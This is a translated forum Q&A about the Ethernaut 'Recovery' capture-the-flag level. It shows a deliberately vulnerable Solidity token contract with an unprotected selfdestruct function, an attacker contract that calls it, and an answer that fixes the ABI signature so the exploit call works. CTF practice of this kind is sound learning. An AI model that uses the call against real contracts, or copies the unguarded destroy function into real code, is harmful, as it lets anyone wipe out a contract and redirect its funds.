[英]Calling function from another contract using call method
我正在做ethernaut Recovery CTF。 为此,我必须在另一个合同中调用'''destroy''' function。 我正在做这将在坚实的'''call'''的帮助下。 但交易正在恢复。
被攻击的契约
contract SimpleToken {
using SafeMath for uint256;
// public variables
string public name;
mapping (address => uint) public balances;
// constructor
constructor(string memory _name, address _creator, uint256 _initialSupply) public {
name = _name;
balances[_creator] = _initialSupply;
}
// collect ether in return for tokens
receive() external payable {
balances[msg.sender] = msg.value.mul(10);
}
// allow transfers of tokens
function transfer(address _to, uint _amount) public {
require(balances[msg.sender] >= _amount);
balances[msg.sender] = balances[msg.sender].sub(_amount);
balances[_to] = _amount;
}
// clean up after ourselves
function destroy(address payable _to) public {
selfdestruct(_to);
}
}
攻击契约
//SPDX-License-Identifier:MIT
pragma solidity ^0.8.0;
contract recovery_solution{
address victim = 0x0EB8e4771ABA41B70d0cb6770e04086E5aee5aB2;
function destroy1(address _to) public{
(bool success, ) = victim.call(abi.encodeWithSignature("destroy(address payable)", _to));
require(success, "Transaction failed");
}
}
有人可以告诉我的攻击代码有什么问题吗?
address payable
类型在 function 签名中简单地表示为address
。
victim.call(abi.encodeWithSignature("destroy(address)", _to));
文档: https://docs.soliditylang.org/en/v0.8.17/abi-spec.html#mapping-solidity-to-abi-types
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.